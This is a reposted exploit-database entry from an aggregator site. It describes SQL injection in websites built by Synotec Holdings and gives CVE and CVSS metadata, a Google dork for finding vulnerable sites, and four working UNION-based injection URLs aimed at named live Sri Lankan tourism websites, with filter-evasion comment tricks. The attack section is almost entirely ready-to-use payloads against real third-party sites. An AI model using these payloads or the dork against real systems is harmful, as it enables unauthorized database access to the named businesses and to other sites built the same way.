Advertisement






Synotec Holdings - Sql Injection

CVE Category Price Severity
CVE-XXXX-XXXX CWE-89 $1000 High
Author Risk Exploitation Type Date
Unknown High Remote 2023-10-01
CVSS
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023100002

Below is a copy:

Synotec Holdings - Sql Injection
*********************************************************
#Exploit Title: Synotec Holdings - Sql Injection
#Date: 2023-09-30
#Exploit Author: Behrouz Mansoori
#Google Dork: "Website By: Synotec Holdings (Pvt) Ltd"
#Category:webapps
#Tested On: Mac, Firefox

Proof of Concept:
### Demo :
https://susanthadriversrilanka.com/view-day-tour.php?id=-1%20/*!12345union*/%20select%201,2,version(),4,5,6,7,8--

http://horizon-villa.com/view-facilities.php?id=-39%20/*!12345union*/%20select%201,version(),3,4,5,6--

https://www.mirissawhalewarriors.com/view-service.php?id=-1%27%20%23asdasd%0Aunion%20%23asdasd%0Aselect%201,version(),3,4,5--+

https://www.srilankaparadisetours.com/view-package.php?id=-2%27%20/*!12345union*/%20select%201,version(),3,4,5--+

*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.